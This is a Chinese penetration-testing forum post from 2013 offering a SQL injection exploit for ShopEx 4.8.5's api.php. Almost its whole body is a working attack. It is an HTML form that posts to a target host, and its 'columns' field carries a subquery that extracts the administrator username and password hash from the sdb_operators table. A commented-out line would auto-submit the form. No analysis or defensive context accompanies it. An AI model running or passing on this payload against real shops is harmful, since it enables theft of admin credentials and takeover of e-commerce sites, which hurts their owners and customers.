中国网络渗透测试联盟
标题:
shopex 4.8.5 api.php注入漏洞0day exp
[打印本页]
作者:
admin
时间:
2013-11-23 15:45
标题:
shopex 4.8.5 api.php注入漏洞0day exp
<form method='post' action='http://www.sysshell.com/api.php?act=search_dly_type&api_version=1.0'> columns:<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1) as name' name='columns' style='width:80%'/><br /> <input type='submit' value='submit' /><br /></form><script>//document.forms[0].submit()</script>
* X! v4 z) j6 C; C0 C
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2